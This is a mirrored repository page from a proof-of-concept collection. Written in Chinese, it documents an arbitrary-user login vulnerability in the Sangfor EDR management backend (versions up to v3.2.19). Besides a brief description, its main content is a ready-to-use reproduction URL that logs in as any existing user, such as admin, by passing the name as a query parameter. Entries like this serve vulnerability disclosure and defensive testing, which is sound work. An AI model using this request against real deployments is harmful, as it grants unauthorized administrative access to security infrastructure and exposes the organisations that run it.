admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/深信服 EDR 后台任意用户登陆漏洞.md
Threekiii 9acf184afd 更新漏洞
2022-12-06 17:17:54 +08:00

384 B
Raw Blame History

深信服 EDR 后台任意用户登陆漏洞

漏洞描述

深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞登录任意用户

漏洞影响

EDR <= v3.2.19

漏洞复现

https://xxx.xxx.xxx.xxx/ui/login.php?user=admin

注意最后的admin需要为存在的用户名

img